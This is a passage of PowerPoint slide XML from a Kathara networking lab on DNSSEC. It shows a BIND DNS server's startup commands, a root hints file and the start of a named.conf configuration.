        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5051B56-15E1-B666-5FF0-AD9CA5DF7B2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74B99C0F-7002-6FD8-B4F1-58C3F405632A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552211" y="2442150"/>
            <a:ext cx="7087578" cy="2176656"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="858"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C8BD3F9-B1B3-0B0F-8B8E-21FAB878872E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="800"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>O</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> address add 100.0.75.10/24 dev eth0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add default via 100.0.75.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -p /var/cache/bind/keys</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind:bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chmod</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R 775 /var/cache/bind</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>systemctl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> start bind9</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9605BA09-9F6A-CBAF-18F3-B5EE8A34DEC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3969" cy="151"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni2.startup</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147277838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8B662A-5053-09B8-BB3A-497905FD17E5}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97658372-D5F4-8A21-3BEA-A2899FB19DE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DB50513-1ACF-33DB-E09F-8419E5FADA9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B607D4F-25BF-3B6E-7588-F1AF4E4D5106}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72531F84-A950-B780-E7AD-B1DB21313170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552211" y="1259632"/>
            <a:ext cx="7087578" cy="986852"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="389"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B99F5D2-FC17-99E2-6B72-39A9D64AB024}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="331"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>O</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>.                   IN  NS    ROOT-SERVER.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ROOT-SERVER.        IN  A     10.0.3.5</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{606E8236-E112-BFBC-AECF-D591E6C3F5B2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3969" cy="151"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/dnsuni2/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db.root</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0557734B-E260-4AAB-3753-489A3FEA7592}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2605878" y="2704954"/>
            <a:ext cx="7087578" cy="3447640"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="1359"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D40278E-B9CE-238F-5D6D-A98B054D465C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="1301"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>O</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>include "/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>named.conf.options</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>";</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>zone "." {</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>type</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>hint</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>    file "/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>bind</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
